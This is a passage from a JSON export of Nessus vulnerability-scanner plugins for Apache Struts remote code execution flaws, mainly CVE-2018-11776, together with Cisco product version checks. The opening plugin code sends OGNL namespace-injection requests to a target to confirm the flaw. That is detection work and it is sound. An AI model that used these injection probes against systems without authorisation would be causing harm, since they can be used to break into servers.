snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # next we try the 2.2.x payload\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = namespace_inject(url:url, payload:payload_2_2);\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # and finally, we try a simple redirect namespace injection\n attack_url = namespace_inject(url:url, payload:payload_redirect);\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n report =\n '\\nNessus confirmed this issue by injecting a simple OGNL addition payload'+\n '\\n( ${{57550614+16044095}} ) into a redirect action namespace. Below is' +\n '\\nthe response :'+\n '\\n\\n' + snip +\n '\\n' + res[1] +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:17", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM & Presence Service is affected by a Remote Code Execution vulnerability. Please see the included Cisco BIDs and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "href": "https://www.tenable.com/plugins/nessus/112288", "sourceData": "#TRUSTED 531d8e919a578f5c402d55046279c6aa0319d64b11e6cfd1d400748c61e7c7ccaa711a8f2191f3390f64108dffec9cda1cfe6622e5965ce8740b74f709d83c9d97499c02c97b3848ad634219e609ff7acf98126943660349b42695aa34d768104c488c436c13e7667ce892766c7d106e37048ddcfba1ac2b772443e7a905b1e8a682e45817ad69bc684a2bce250dff79993839689a846ddc0e06ab184bbfc3958301fba47c2702e4bcc930e1eb90226c73a1a769e5c70c5b10a8341dac93b861d607f4713d05ce8f97544352f71f3a88dc9c2786a8e8747ac50f485c2b647276a41f88bb7c7cd340c7e3af67cd61a049cca011e3d9942ca32f0319c5fec33e651fb67d3d5f6f7859ea8414f333e21cac76fa1b4d3547ce78f376a0411eb50ef2dcbc163acce202bce2ef787f11028a173ada909c2b9bd82caddf4bb845e8159b4e4fb812ad4e8e6e24fad03496b0ac669c65e83433510c8b2b7915fa57f2f1f21d5866de373bf1fa4ecf5d5a50820a8f105b1744bd5693eda065b42bbb5486f28a0d2a94e6aa24fb12daafc9bf238b9c0add4691b0cbe3fe731b48a92d99ad9d4ffa22d31da79c776337c955cf2d58045aecf66c7250e7e147e1c6c36943213d6eea7c6c09437c8ec741e07e289ae48a2ec13c44a4b8ccf0d1b9824180479f8e787bdd465aa0346c61b3dcb6fe34ee45d7327e52b9c09a0dc5a05e7f4ed13b56\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112288);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14049\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)\");\n script_summary(english:\"Checks the Cisco Unified Communications Manager version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM & Presence Service is affected by a Remote\nCode Execution vulnerability. Please see the included Cisco BIDs and\nthe Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14049.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/UCOS/Cisco Unified Presence/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Presence\");\n\nversion_list = make_list('11.0.1', '11.5.1', '12.0.1');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14049\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:50", "description": "According to its self-reported version, the Cisco Identity Services Engine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-08-31T00:00:00", "type": "nessus", "title": "Cisco Identity Services Engine Struts2 Namespace Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/h:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine", "cpe:/a:cisco:identity_services_engine_software"], "id": "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "href": "https://www.tenable.com/plugins/nessus/112219", "sourceData": "#TRUSTED 97aa159b84dc044b30c1959493ad4c2ef0b54f85d3e848f88bee9278a7ddad8a181a74909f1d0d76ce1b6789d6c52e06d8149ee1cd6b40ddc4809e01f93833be8020dacc4dd4a97c9adce91fde281659f57715154563c57a7067c369b7d014b2a20c63c0692370955493497ee5cc676ed67b7252f230321c84a756e4f7c6d300d603cb3a8441874a6b4a31d3e38b204cdfedfac2e159a1a6050a4e54e7e7d3a571f78bedb4ce38b25be27cfd186ec5a6d7ecb38bfcfc47307d6e8f2129c339cc2a40a9c1c376b220a07abb868589c8dd6bda1077121b2eaf32b235e36d05a0421ed24805286671b039794ad9999fff2a8ceea76e4cc2f7cf8611fd9b28ec473949aba55b3f4a0cfd91455716d0733c829031593c83528f5d8fbcb05351beaad63c70c1095d11b5d38e04cba7fd3800c21beb5e6382e20a3ccb6d00ac98d43d6ea3f1ff6566edeb9f0e8d98068cf9d6c881c0642ffda92b77e30b7b7ddf74136dca18b0813568c2f591018a81531bae509d7df421eef82e4d4fba2ffd1b76b3a561e1018e2630dac16d14f05b6342fb8c08ca13b94882eb818ba59f9f11fce385b9a3bf4dd7f0524b9d50096716733342ac10b83b1e52ba609ba841786810a1c88816deeb90ef81ff652cb02d46c1babdec6c8b9d00657c051ee857779d7fd75b624224079533e69b4308b4ee87d8a1cc79d022715df20de81e55f351e7a543e7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112219);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14030\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Identity Services Engine Struts2 Namespace Vulnerability\");\n script_summary(english:\"Checks the Cisco Identity Services Engine Software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Identity Services\nEngine Software is affected by a struts2 namespace vulnerability.\nPlease see the included Cisco BID and the Cisco Security Advisory for\nmore information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14030\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14030.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:identity_services_engine_software\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ise_detect.nbin\");\n script_require_keys(\"Host/Cisco/ISE/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Identity Services Engine Software\");\n\nvuln_ranges = [\n { 'min_ver' : '2.0.0.0', 'fix_ver' : '2.0.0.306' },\n { 'min_ver' : '2.0.1.0', 'fix_ver' : '2.0.1.130' },\n { 'min_ver' : '2.1.0.0', 'fix_ver' : '2.1.0.474' },\n { 'min_ver' : '2.2.0.0', 'fix_ver' : '2.2.0.470' },\n { 'min_ver' : '2.3.0.0', 'fix_ver' : '2.3.0.298' },\n { 'min_ver' : '2.4.0.0', 'fix_ver' : '2.4.0.357' }\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\n# ISE version doesn't change when patches are installed, so even if\n# they are on the proper version we have to double check patch level\nrequired_patch = '';\nif (product_info['version'] =~ \"^2\\.4\\.0($|[^0-9])\") required_patch = '2';\nif (product_info['version'] =~ \"^2\\.3\\.0($|[^0-9])\") required_patch = '4';\nif (product_info['version'] =~ \"^2\\.2\\.0($|[^0-9])\") required_patch = '9';\nelse if (product_info['version'] =~ \"^2\\.1\\.0($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0\\.1($|[^0-9])\") required_patch = '7';\nelse if (product_info['version'] =~ \"^2\\.0($|[^0-9])\") required_patch = '7';\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , \"CSCvm14030\",\n 'fix' , 'See advisory'\n);\n\n# uses required_patch parameters set by above version ranges\ncisco::check_and_report(product_info:product_info, reporting:reporting, workarounds:workarounds, workaround_params:workaround_params, vuln_ranges:vuln_ranges, required_patch:required_patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:40", "description": "The version of Apache Struts running on the remote host is 2.3.x prior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a possible remote code execution vulnerability when results are used without setting a namespace along with an upper action that does not have a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-08-22T00:00:00", "type": "nessus", "title": "Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_17.NASL", "href": "https://www.tenable.com/plugins/nessus/112036", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112036);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.x\nprior to 2.3.35, or 2.5.x prior to 2.5.17. It, therefore, contains a\npossible remote code execution vulnerability when results are used\nwithout setting a namespace along with an upper action that does not\nhave a namespace set or has a wildcard namespace set.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2018/Aug/46\");\n script_set_attribute(attribute:\"see_also\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.3\", \"max_version\" : \"2.3.34\", \"fixed_version\" : \"2.3.35\" },\n { \"min_version\" : \"2.5\", \"max_version\" : \"2.5.16\", \"fixed_version\" : \"2.5.17\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:33", "description": "According to its self-reported version, the Cisco Unified Communications Manager (CUCM) running on the remote device is affected by a remote code execution vulnerability. Please see the included Cisco BID and the Cisco Security Advisory for more information.", "cvss3": {}, "published": "2018-09-05T00:00:00", "type": "nessus", "title": "Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "href": "https://www.tenable.com/plugins/nessus/112289", "sourceData": "#TRUSTED 5538e58acd3b9c3603d69886501b4d03206d911e89a8d42c5b4e7eca707c4d625bc7498ef348a9ccbcb5336c36a12a8c522e9b7208a928417ca393d93d9b75b3674b5020a3adf4e9ded633106ddd86864d79657cbdb95644342b2f275592d8f9e6fc1f66ff78f01c1325c212b34be69ad9e19e9079abea97ba850b3de2a5b4c17ea6bcb025e35351d747f7a3bfd9a692abe32cfb1acd6df9a1ed4437cef173f52741ba940ea420a6a307c28113c77d3911f694bbd8b4770b2e393e952b7721160a3ace2b9a105b946878666ddb6b6277e8dd37cc0b540d3cab9ba05675333685d3567dc787a898345d49807afa2c4e8dadc80157671c59645ec28d4d731254f700afcdde8541b7fc40f5bf22104a815dfb9ffec8005793c65a930bc671999876981b110d057967ac4aec3e59486c42d91bfdbacd15266c2227ee145c9c1f68b594923b7c279533429a89c5a243111afa033972ae83c9fc79e2601de851679ed9c299cb484ffd80c57ac3b34925bb3cba116fcda0316d36ecd2faa6315da0eb4e36614b14339a5b4a8bf1733e633b7f9f29f76f24eb6dbba11d66280d6e3e0195481f24ff5256f30dbac9ca2fbd0297cc6cc377e602403cf222d850e159cf5a4a46f673c55f9ece04e1b4703056a271d88239f32fd0101e729543bc9b902ffe81653218ce1f59a8de7edc84c8cd3a6afeafbbf24ba8b4385bcd815cde5a4733f9\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112289);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm14042\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20180823-apache-struts\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager (CUCM) running on the remote device is affected\nby a remote code execution vulnerability. Please see the included\nCisco BID and the Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180823-apache-struts\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56a0e547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm14042\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm14042.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_workarounds.inc\");\ninclude(\"ccf.inc\");\n\nproduct_info = cisco::get_product_info(name:\"Cisco Unified Communications Manager\");\n\nversion_list = make_list(\n '11.0.1.10000.10',\n '11.5.1.10000.6',\n '12.0.1.10000.10',\n '12.5.0.98000.981');\n\nworkarounds = make_list(CISCO_WORKAROUNDS['no_workaround']);\nworkaround_params = make_list();\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['display_version'],\n 'bug_id' , \"CSCvm14042\");\n\ncisco::check_and_report(product_info:product_info, workarounds:workarounds, workaround_params:workaround_params, reporting:reporting, vuln_versions:version_list);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:22", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/97576", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97576);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-5638\");\n script_bugtraq_id(96729);\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.3.5\nthrough 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,\naffected by a remote code execution vulnerability in the Jakarta\nMultipart parser due to improper handling of the Content-Type,\nContent-Disposition, and Content-Length headers. An unauthenticated,\nremote attacker can exploit this, via a specially crafted header value\nin the HTTP request, to potentially execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-046\");\n 